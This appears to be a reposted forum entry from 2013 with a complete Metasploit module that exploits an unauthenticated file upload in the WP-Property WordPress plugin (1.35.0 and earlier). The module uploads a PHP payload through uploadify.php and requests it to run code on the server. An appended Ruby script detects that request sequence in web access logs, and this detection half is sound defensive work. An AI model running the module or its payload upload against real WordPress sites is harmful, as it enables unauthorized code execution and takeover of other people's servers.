WordPress WP-Property PHP File Upload Vulnerability

Posted 2013-1-4 19:51:30

Metasploit module (Ruby) for the WordPress WP-Property PHP file upload vulnerability:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Presence check only: a 200 for uploadify.php means the vulnerable plugin file is
  # reachable, not that the upload actually succeeds, hence CheckCode::Appears.
  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random .php name; the payload deletes itself once it has run (:unlink_self).
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # uploadify.php expects a multipart form with the file in "Filedata" and the
    # destination directory in "folder"; the folder is the uploadify directory itself.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # A successful upload echoes back the path of the stored file.
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    # Request the uploaded file so the web server executes the PHP payload.
    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it; I mean msf.
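The module above leaves a distinctive three-request trail on the web server: a GET probe of uploadify.php (its check), a multipart POST to the same file, and then a GET of a freshly named .php in the uploadify directory. The following Ruby script, an added example that is not part of the post or of the Metasploit module, turns that sequence into detection logic over Apache/nginx combined-format access logs. Only the plugin paths come from the module; the log-format regex, the five-minute correlation window, the alert hash layout and the sample log lines are constructed for this example.

```ruby
require 'time'

# Paths taken from the Metasploit module; everything else is constructed for this example.
UPLOADIFY_ENDPOINT = %r{/wp-content/plugins/wp-property/third-party/uploadify/uploadify\.php(\?|$)}i
# Any other .php directly inside the uploadify directory, i.e. where the module drops its payload.
UPLOADED_PHP       = %r{/wp-content/plugins/wp-property/third-party/uploadify/(?!uploadify\.php)[^/?\s]+\.php(\?|$)}i

# Apache/nginx "combined" format: host ident user [time] "METHOD path proto" status bytes ...
LOG_LINE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) /

Event = Struct.new(:host, :time, :method, :path, :status)

def parse_line(line)
  m = LOG_LINE.match(line) or return nil
  Event.new(m[1], Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'), m[3], m[4], m[5].to_i)
end

# Walks the log in order and returns one alert hash per suspicious request.
# kinds: :probe  (GET uploadify.php, what the module's check() does)
#        :upload (POST to uploadify.php, the multipart file upload)
#        :exec   (GET of a .php in the upload directory; :correlated is true when the
#                 same host had an HTTP 200 POST within the last `window` seconds)
def detect(lines, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] }   # host => times of successful POSTs
  alerts = []
  lines.each do |line|
    ev = parse_line(line) or next
    if ev.path =~ UPLOADIFY_ENDPOINT
      if ev.method == 'POST'
        uploads[ev.host] << ev.time if ev.status == 200
        alerts << { kind: :upload, host: ev.host, path: ev.path, status: ev.status }
      elsif ev.method == 'GET'
        alerts << { kind: :probe, host: ev.host, path: ev.path, status: ev.status }
      end
    elsif ev.method == 'GET' && ev.path =~ UPLOADED_PHP
      correlated = uploads[ev.host].any? { |t| (ev.time - t).between?(0, window) }
      alerts << { kind: :exec, host: ev.host, path: ev.path, status: ev.status, correlated: correlated }
    end
  end
  alerts
end

# Constructed sample log: one host replays the module's check() + exploit() sequence,
# a second host is ordinary traffic. Addresses are documentation ranges.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:50:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:50:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 97 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:50:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/kqzmt.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [04/Jan/2013:19:55:00 +0800] "GET /wordpress/?p=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  detect(SAMPLE_LOG.lines).each { |a| puts a.inspect }
end
```

The :exec alert is the one worth paging on: a PHP file executed from the uploadify directory should never happen in normal operation, and when it follows a 200 POST from the same host the upload itself most likely succeeded. The :probe alert on its own is noisy (scanners request plugin files constantly), so it is best kept as context rather than an alert in its own right.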